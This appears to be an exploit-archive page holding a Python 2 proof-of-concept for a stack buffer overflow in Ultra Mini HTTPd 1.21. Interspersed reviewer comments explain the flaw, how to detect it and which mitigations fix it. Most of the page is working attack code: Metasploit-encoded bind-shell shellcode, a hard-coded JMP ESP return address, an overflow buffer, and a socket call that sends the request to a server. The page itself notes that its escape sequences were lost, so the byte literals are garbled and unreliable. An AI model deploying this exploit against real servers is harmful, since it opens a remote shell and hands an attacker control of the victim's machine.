Home / exploits Ultra Mini HTTPd 1.21 Buffer Overflow
Posted on 12 July 2013
# Exploit Title: Ultra Mini HTTPD stack buffer overflow
# Date: 10 July 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.picolix.jp/
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.21
# Tested on: Windows XP Professional SP2, English
#
# Description:
# A buffer overflow is triggered when requesting a very long
# resource name.
#
# Reviewer notes (defensive reading of this PoC):
# - The trigger is a single GET request whose path is several kilobytes of
#   one repeated character (see `payload` below). A server that copies the
#   request-URI into a fixed-size stack buffer without a length check lets
#   that copy run past the saved return address. Detection: request lines far
#   longer than any legitimate resource name, dominated by one repeated byte.
# - The overwritten return address is a fixed absolute ntdll.dll address that
#   is only meaningful for the single OS build named above; the PoC assumes
#   no ASLR and no DEP. Bounds-checked copying in the server plus those
#   OS-level mitigations are the fixes.
# - This is Python 2 code (print statement, str-typed socket payload).
# - As rendered on this page the byte-string escape sequences and the
#   line separators of the HTTP request appear to have been lost in
#   extraction, so the literals below are NOT the original bytes; do not
#   lift them as signature or IoC content.
import socket
import struct

# msfpayload windows/shell_bind_tcp R |
# msfencode -b "x00x0ax0dx20x0bx09x0c"
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
# Metasploit-generated, encoded bind-shell payload. The excluded ("bad")
# characters are NUL plus whitespace / line-terminator bytes, presumably
# because an HTTP parser would treat them as the end of the request path.
shellcode = (
    "xbax1fxb5xaexa1xddxc4xd9x74x24xf4x5ex33xc9" +
    "xb1x56x31x56x13x83xc6x04x03x56x10x57x5bx5d" +
    "xc6x1exa4x9ex16x41x2cx7bx27x53x4ax0fx15x63" +
    "x18x5dx95x08x4cx76x2ex7cx59x79x87xcbxbfxb4" +
    "x18xfax7fx1axdax9cx03x61x0ex7fx3dxaax43x7e" +
    "x7axd7xabxd2xd3x93x19xc3x50xe1xa1xe2xb6x6d" +
    "x99x9cxb3xb2x6dx17xbdxe2xddx2cxf5x1ax56x6a" +
    "x26x1axbbx68x1ax55xb0x5bxe8x64x10x92x11x57" +
    "x5cx79x2cx57x51x83x68x50x89xf6x82xa2x34x01" +
    "x51xd8xe2x84x44x7ax61x3exadx7axa6xd9x26x70" +
    "x03xadx61x95x92x62x1axa1x1fx85xcdx23x5bxa2" +
    "xc9x68x38xcbx48xd5xefxf4x8bxb1x50x51xc7x50" +
    "x85xe3x8ax3cx6axdex34xbdxe4x69x46x8fxabxc1" +
    "xc0xa3x24xccx17xc3x1fxa8x88x3ax9fxc9x81xf8" +
    "xcbx99xb9x29x73x72x3axd5xa6xd5x6ax79x18x96" +
    "xdax39xc8x7ex31xb6x37x9ex3ax1cx4ex98xf4x44" +
    "x03x4fxf5x7axb2xd3x70x9cxdexfbxd4x36x76x3e" +
    "x03x8fxe1x41x61xa3xbaxd5x3dxadx7cxd9xbdxfb" +
    "x2fx76x15x6cxbbx94xa2x8dxbcxb0x82xc4x85x53" +
    "x58xb9x44xc5x5dx90x3ex66xcfx7fxbexe1xecxd7" +
    "xe9xa6xc3x21x7fx5bx7dx98x9dxa6x1bxe3x25x7d" +
    "xd8xeaxa4xf0x64xc9xb6xccx65x55xe2x80x33x03" +
    "x5cx67xeaxe5x36x31x41xacxdexc4xa9x6fx98xc8" +
    "xe7x19x44x78x5ex5cx7bxb5x36x68x04xabxa6x97" +
    "xdfx6fxd6xddx7dxd9x7fxb8x14x5bxe2x3bxc3x98" +
    "x1bxb8xe1x60xd8xa0x80x65xa4x66x79x14xb5x02" +
    "x7dx8bxb6x06"
)

# 7C941EED , JMP ESP , ntdll.dll
# Stack layout as the PoC states it: 5392 bytes of filler reach the saved
# return address, which is replaced with the JMP ESP address packed as a
# little-endian 32-bit value so that execution continues just past it.
payload = "A" * 5392 + struct.pack("<I", 0x7C941EED)
# The 6-byte prefix ahead of the shellcode is not explained in the PoC; it
# resembles a stack-adjustment stub but that is unverified here. The role of
# the trailing "B" padding is likewise undocumented.
payload += "x81xc4xf0xeaxffxff" + shellcode + "B" * 4230

print "[+] sending payload, length", len(payload)

# Hard-coded private lab address; port 80 is the HTTP listener under test.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.37.175", 80))
# Request line carries the oversized path; a Host header follows. (The
# separators between these pieces are rendered as plain spaces on this page.)
buf = (
    "GET /" + payload + " HTTP/1.1 " +
    "Host: 192.168.37.175" + " "
)
# NOTE: send() may transmit fewer bytes than len(buf); the PoC does not
# check the return value or use sendall().
s.send(buf)
s.close()
